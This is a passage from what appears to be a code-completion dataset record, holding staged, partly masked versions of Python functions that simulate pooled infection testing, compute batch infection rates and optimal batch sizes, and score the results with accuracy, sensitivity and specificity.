The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate 
of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-3": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of 
type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\n<mask token>\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n 
temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n pred, consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':\n recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score\n (data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],\n pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),\n 'test_consum': consum, 'ind_consum': ind_con, 'batch_consum': \n consum - 
ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n pred, consum, ind_con = seq_test(data[i], **kwargs)\n acc[i] = np.mean(pred[:, 1] == data[i][:, 1])\n sens[i] = recall_score(data[i][:, 1], pred[:, 1])\n spec[i] = specificity_score(data[i][:, 1], pred[:, 1])\n ppv[i] = precision_score(data[i][:, 1], pred[:, 1])\n npv[i] = npv_score(data[i][:, 1], pred[:, 1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum - ind_con\n result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':\n npv, 'test_consum': test_consum, 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\n<mask token>\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of 
type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 
0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-4": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of 
type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\ndef one_batch_test_int_solver(prevalence_rate, typeII_error, typeI_error,\n batch_limit, n_initial_guess=2):\n \"\"\"\n A function gives (int) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n n_initial_guess(float): the initial guess \n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess:\n batch_limit (int): the upper limit of batch size\n\n Output:\n (int): the optimal batch size\n \"\"\"\n sol_float = one_batch_test_solver(prevalence_rate, typeII_error,\n typeI_error, 